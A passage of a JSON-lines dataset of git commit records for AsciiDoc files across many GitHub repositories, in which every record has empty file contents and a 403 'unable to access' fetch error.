mel,yuruki\/camel,nikhilvibhav\/camel,kevinearls\/camel,rmarting\/camel,tdiesler\/camel,rmarting\/camel,w4tson\/camel,pkletsko\/camel,pkletsko\/camel,tlehoux\/camel,mgyongyosi\/camel,chirino\/camel,anoordover\/camel,scranton\/camel,rmarting\/camel,tadayosi\/camel,jarst\/camel,veithen\/camel,lburgazzoli\/camel,sirlatrom\/camel,bhaveshdt\/camel,RohanHart\/camel,bgaudaen\/camel,scranton\/camel,jamesnetherton\/camel,apache\/camel,anton-k11\/camel,lburgazzoli\/apache-camel,bhaveshdt\/camel,pax95\/camel,cunningt\/camel,curso007\/camel","old_file":"camel-core\/src\/main\/docs\/exchangeProperty-language.adoc","new_file":"camel-core\/src\/main\/docs\/exchangeProperty-language.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1b349ce88dbc6030a88ddced9fc6f0f928242c7e","subject":"Update 2017-10-25-Code-Reuse-In-Actual-Practice.adoc","message":"Update 2017-10-25-Code-Reuse-In-Actual-Practice.adoc","repos":"apoch\/blog,apoch\/blog,apoch\/blog,apoch\/blog","old_file":"_posts\/2017-10-25-Code-Reuse-In-Actual-Practice.adoc","new_file":"_posts\/2017-10-25-Code-Reuse-In-Actual-Practice.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/apoch\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d08dfa53946e13b5b957ad533c5864d6268542c","subject":"Update 2017-04-13-Week-3-Simple-enemy-AI-and-Spawn-Areas.adoc","message":"Update 2017-04-13-Week-3-Simple-enemy-AI-and-Spawn-Areas.adoc","repos":"mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io","old_file":"_posts\/2017-04-13-Week-3-Simple-enemy-AI-and-Spawn-Areas.adoc","new_file":"_posts\/2017-04-13-Week-3-Simple-enemy-AI-and-Spawn-Areas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mahrocks\/mahrocks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7fdea703fe1095d1957f42a64593141d77e14222","subject":"Update 2015-10-12-Smart-Health-Management-Part-2-PHR-as-API.adoc","message":"Update 2015-10-12-Smart-Health-Management-Part-2-PHR-as-API.adoc","repos":"Cribstone\/humblehacker,Cribstone\/humblehacker,Cribstone\/humblehacker","old_file":"_posts\/2015-10-12-Smart-Health-Management-Part-2-PHR-as-API.adoc","new_file":"_posts\/2015-10-12-Smart-Health-Management-Part-2-PHR-as-API.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cribstone\/humblehacker.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6576787e9ce47de71c1db543e54ed6623dd6ad49","subject":"Update 2017-01-20-Automated-Testing-Using-Jenkins-on-AWS.adoc","message":"Update 2017-01-20-Automated-Testing-Using-Jenkins-on-AWS.adoc","repos":"trycrmr\/hubpress.io,trycrmr\/hubpress.io,trycrmr\/hubpress.io,trycrmr\/hubpress.io","old_file":"_posts\/2017-01-20-Automated-Testing-Using-Jenkins-on-AWS.adoc","new_file":"_posts\/2017-01-20-Automated-Testing-Using-Jenkins-on-AWS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/trycrmr\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08dfe0fd35bdc4fad0b2ae195b809fafa34f1666","subject":"short readme","message":"short readme","repos":"man-at-home\/folderstats_exporter","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/man-at-home\/folderstats_exporter.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"60d0daab7f211580d122a4d2e9aa789f1ffefe52","subject":"y2b create post Unboxing The YouTube Silver Play Button!","message":"y2b create post Unboxing The YouTube Silver Play Button!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-03-08-Unboxing-The-YouTube-Silver-Play-Button.adoc","new_file":"_posts\/2014-03-08-Unboxing-The-YouTube-Silver-Play-Button.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9212d6c3e7f832a8b2427aa2378d303d0c0ae2f","subject":"Update 2017-05-19-swift-chat.adoc","message":"Update 
2017-05-19-swift-chat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-swift-chat.adoc","new_file":"_posts\/2017-05-19-swift-chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9bf27c0c0aeaa4f38b5f849f9c37061bd8fc067","subject":"Fix broken url for user-guide.pdf (#660)","message":"Fix broken url for user-guide.pdf (#660)\n\n","repos":"DozerMapper\/dozer,orange-buffalo\/dozer,garethahealy\/dozer,orange-buffalo\/dozer,DozerMapper\/dozer,garethahealy\/dozer","old_file":"docs\/asciidoc\/SUMMARY.adoc","new_file":"docs\/asciidoc\/SUMMARY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/garethahealy\/dozer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"80dc6924f814363040d231bc46ba6428616ed214","subject":"Update 2015-10-05-Two-sides-of-the-same-coin.adoc","message":"Update 2015-10-05-Two-sides-of-the-same-coin.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-05-Two-sides-of-the-same-coin.adoc","new_file":"_posts\/2015-10-05-Two-sides-of-the-same-coin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc77e790d66e133e7bbd6cb985f0334125936b6f","subject":"Update 2017-04-01-Kathiyawadi-Baingan-bhartha.adoc","message":"Update 2017-04-01-Kathiyawadi-Baingan-bhartha.adoc","repos":"birvajoshi\/birvajoshi.github.io,birvajoshi\/birvajoshi.github.io,birvajoshi\/birvajoshi.github.io,birvajoshi\/birvajoshi.github.io","old_file":"_posts\/2017-04-01-Kathiyawadi-Baingan-bhartha.adoc","new_file":"_posts\/2017-04-01-Kathiyawadi-Baingan-bhartha.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/birvajoshi\/birvajoshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"744525602272b2effdbf3d1b36637461b13e8389","subject":"Update 2018-07-30-Facebook-A-P-Iver311.adoc","message":"Update 2018-07-30-Facebook-A-P-Iver311.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-30-Facebook-A-P-Iver311.adoc","new_file":"_posts\/2018-07-30-Facebook-A-P-Iver311.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"596dfec0a46e4a924d58d45cb7384b99b35c01bb","subject":"Update 2015-10-20-Episode-26-Ten-Seconds-or-Less-and-No-Farts.adoc","message":"Update 
2015-10-20-Episode-26-Ten-Seconds-or-Less-and-No-Farts.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-10-20-Episode-26-Ten-Seconds-or-Less-and-No-Farts.adoc","new_file":"_posts\/2015-10-20-Episode-26-Ten-Seconds-or-Less-and-No-Farts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdd67c2f5e03c5e4c25444337f9b9e6521f1541f","subject":"Formatting","message":"Formatting","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"readme.asciidoc","new_file":"readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2444ae3808311f7a427e8a2dc77583273a8b4cc7","subject":"y2b create post Zoom H1 Unboxing \\u0026 Overview","message":"y2b create post Zoom H1 Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-08-03-Zoom-H1-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-08-03-Zoom-H1-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e8ff17f23519ba9bd0507feb78881fa00fa0cb8","subject":"Publish 20150327-Happy-Easter.adoc","message":"Publish 20150327-Happy-Easter.adoc","repos":"mcrotty\/hubpress.io,mcrotty\/hubpress.io,mcrotty\/hubpress.io,mcrotty\/hubpress.io","old_file":"20150327-Happy-Easter.adoc","new_file":"20150327-Happy-Easter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcrotty\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5f8d344fdbe7f99e863c93fdb4a52bf1f5d4fb7","subject":"Update 2017-03-10-mark-read-all-by-Google-Extension.adoc","message":"Update 2017-03-10-mark-read-all-by-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-mark-read-all-by-Google-Extension.adoc","new_file":"_posts\/2017-03-10-mark-read-all-by-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c3f3f115ec4f3f7e06d064287e846b951093502","subject":"Update 2017-06-01-Episode-101-Mr-Hart-whatta-mess.adoc","message":"Update 
2017-06-01-Episode-101-Mr-Hart-whatta-mess.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-06-01-Episode-101-Mr-Hart-whatta-mess.adoc","new_file":"_posts\/2017-06-01-Episode-101-Mr-Hart-whatta-mess.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d62e2ef330889a9d424df2f5a94ba1b2d25f35f8","subject":"y2b create post 3 Unique Gadgets You Can Buy Right Now","message":"y2b create post 3 Unique Gadgets You Can Buy Right Now","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-08-3UniqueGadgetsYouCanBuyRightNow.adoc","new_file":"_posts\/2018-02-08-3UniqueGadgetsYouCanBuyRightNow.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90dc3e9735e849cd0905da6a275cb7649c650de0","subject":"Add Bnum adoc","message":"Add Bnum adoc\n","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/api\/ubf\/Bnum.adoc","new_file":"doc\/api\/ubf\/Bnum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endurox-dev\/endurox.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"5fc0116e105ee9a4ff7f006f17d5bb17d419fb7a","subject":"Renamed '_posts\/2017-10-06-Making-working-with-google-app-script-easier.adoc' to '_posts\/2017-10-06-Making-google-app-script-easier.adoc'","message":"Renamed '_posts\/2017-10-06-Making-working-with-google-app-script-easier.adoc' to '_posts\/2017-10-06-Making-google-app-script-easier.adoc'","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2017-10-06-Making-google-app-script-easier.adoc","new_file":"_posts\/2017-10-06-Making-google-app-script-easier.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b524ecb3994b1b5eca7bdaff497170ae3a8e11d9","subject":"Update 2018-02-05-A-A-A-A-A-Think-About-Documents.adoc","message":"Update 2018-02-05-A-A-A-A-A-Think-About-Documents.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-05-A-A-A-A-A-Think-About-Documents.adoc","new_file":"_posts\/2018-02-05-A-A-A-A-A-Think-About-Documents.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fbba01162156dcd964175b6fc484a3ddb35130a4","subject":"Remove webapp setup instructions because the js files are checked into git (to make it easier to just run the project)","message":"Remove webapp setup 
instructions because the js files are checked into git (to make it easier to just run the project)\n","repos":"ge0ffrey\/optaconf,mdanter\/optaconf,oskopek\/optaconf,mdanter\/optaconf,oskopek\/optaconf,ge0ffrey\/optaconf,mdanter\/optaconf,ge0ffrey\/optaconf,oskopek\/optaconf","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdanter\/optaconf.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6b6a4b4268e61ce86234754ce5f42965a22d9f8e","subject":"Update 2019-01-31-Spring-RES-Tul-Web-Service-MongoDB-Data.adoc","message":"Update 2019-01-31-Spring-RES-Tul-Web-Service-MongoDB-Data.adoc","repos":"zouftou\/zouftou.github.io,zouftou\/zouftou.github.io","old_file":"_posts\/2019-01-31-Spring-RES-Tul-Web-Service-MongoDB-Data.adoc","new_file":"_posts\/2019-01-31-Spring-RES-Tul-Web-Service-MongoDB-Data.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zouftou\/zouftou.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0f0a17558738a08ccf6eeb42c03a31591d9cc6f","subject":"Update 2015-11-16-Mover-ficheros-ocultos-entre-directorios.adoc","message":"Update 2015-11-16-Mover-ficheros-ocultos-entre-directorios.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-16-Mover-ficheros-ocultos-entre-directorios.adoc","new_file":"_posts\/2015-11-16-Mover-ficheros-ocultos-entre-directorios.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3245b24ce70694d81447542b66556f14ae7fa7e","subject":"fixing typo","message":"fixing typo\n","repos":"couchbaselabs\/Workshop,couchbaselabs\/Workshop,couchbaselabs\/Workshop","old_file":"connect2016\/developer\/README.adoc","new_file":"connect2016\/developer\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/couchbaselabs\/Workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9532f33ac70bc79a4ac7bec54c4d47002d6c35fc","subject":"add clojured","message":"add clojured\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2022\/clojured.adoc","new_file":"content\/events\/2022\/clojured.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"9020b8d850253fb386f812460770058c247477b8","subject":"y2b create post The Wrist Mounted Flamethrower!","message":"y2b create post The Wrist Mounted Flamethrower!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-04-The-Wrist-Mounted-Flamethrower.adoc","new_file":"_posts\/2016-08-04-The-Wrist-Mounted-Flamethrower.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"3a2d6559fb256e0f6a8a79f9b262d2558d60de03","subject":"Added first version of a migration guide for PrettyFaces 3.x users","message":"Added first version of a migration guide for PrettyFaces 3.x users\n","repos":"jsight\/rewrite,chkal\/rewrite,jsight\/rewrite,ocpsoft\/rewrite,chkal\/rewrite,chkal\/rewrite,jsight\/rewrite,ocpsoft\/rewrite,ocpsoft\/rewrite,jsight\/rewrite,ocpsoft\/rewrite,chkal\/rewrite,chkal\/rewrite,ocpsoft\/rewrite,jsight\/rewrite","old_file":"documentation\/src\/main\/asciidoc\/migration\/prettyfaces3.asciidoc","new_file":"documentation\/src\/main\/asciidoc\/migration\/prettyfaces3.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsight\/rewrite.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"942172fe343dfeef66c16c360b20c08f04408e09","subject":"Fix attachment typo","message":"Fix attachment typo\n","repos":"Darsstar\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,mstahv\/framework,mstahv\/framework,Darsstar\/framework,mstahv\/framework,Darsstar\/framework,asashour\/framework,asashour\/framework","old_file":"documentation\/articles\/IntegratingAnExistingGWTWidget.asciidoc","new_file":"documentation\/articles\/IntegratingAnExistingGWTWidget.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"98c090d54ebccd461f1eb9240dd753d7cf4ab651","subject":"Added contributing.","message":"Added contributing.\n","repos":"KotlinBy\/awesome-kotlin,KotlinBy\/awesome-kotlin,KotlinBy\/awesome-kotlin,KotlinBy\/awesome-kotlin","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KotlinBy\/awesome-kotlin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"de0c63d9718e367726525b36e40bc49268f59ea3","subject":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","message":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8ec6c1a52a0a6cf6d11d897650fbdda743bafad","subject":"Better comment - CL","message":"Better comment - CL\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"8fb52efdd74e53654acd167673842014385be5f0","subject":"Blog about BTM rename to APM (#178)","message":"Blog about BTM rename to APM 
(#178)","repos":"jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/06\/01\/hawkular-btm-to-apm.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/06\/01\/hawkular-btm-to-apm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fab6af6960c8e7c1d3afa04f64cb20c49e11b77b","subject":"Update 2017-05-31-Java-types.adoc","message":"Update 2017-05-31-Java-types.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-31-Java-types.adoc","new_file":"_posts\/2017-05-31-Java-types.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1dc067df0e37bdbf007d1aa876a8e61707517c2","subject":"Update 2017-07-07-Cloud-Spanner.adoc","message":"Update 2017-07-07-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab791ce7a8ca78898b2e6186649d861dbe723dd9","subject":"Update 2017-06-11-an-imaginary-commencement-address.adoc","message":"Update 2017-06-11-an-imaginary-commencement-address.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2017-06-11-an-imaginary-commencement-address.adoc","new_file":"_posts\/2017-06-11-an-imaginary-commencement-address.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8901cd5d38b2b5c648709938f85aa73f58404eae","subject":"Update 2015-09-07-Herzlich-Willkommen.adoc","message":"Update 
2015-09-07-Herzlich-Willkommen.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2015-09-07-Herzlich-Willkommen.adoc","new_file":"_posts\/2015-09-07-Herzlich-Willkommen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6d6e62b4b437002b2e09304fdc00e36c2a3cd02","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75b2894a52b52b828cd4437811f314c56e7f8509","subject":"Update 2019-02-04-Google-Spread-Sheet.adoc","message":"Update 2019-02-04-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71d426e5c376b318b38361498e8e9258213105fa","subject":"[DOC] Update requirements","message":"[DOC] Update requirements\n","repos":"aie108\/elasticsearch-hadoop,sarwarbhuiyan\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,samkohli\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,jasontedor\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,trifork\/elasticsearch-hadoop,huangll\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,kai5263499\/elasticsearch-hadoop,puneetjaiswal\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/intro\/requirements.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/intro\/requirements.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/huangll\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5a8bf341270b15aedc59d40fd85a1a49112a9950","subject":"Update 2016-07-22-prova.adoc","message":"Update 2016-07-22-prova.adoc","repos":"lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io","old_file":"_posts\/2016-07-22-prova.adoc","new_file":"_posts\/2016-07-22-prova.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lerzegov\/lerzegov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
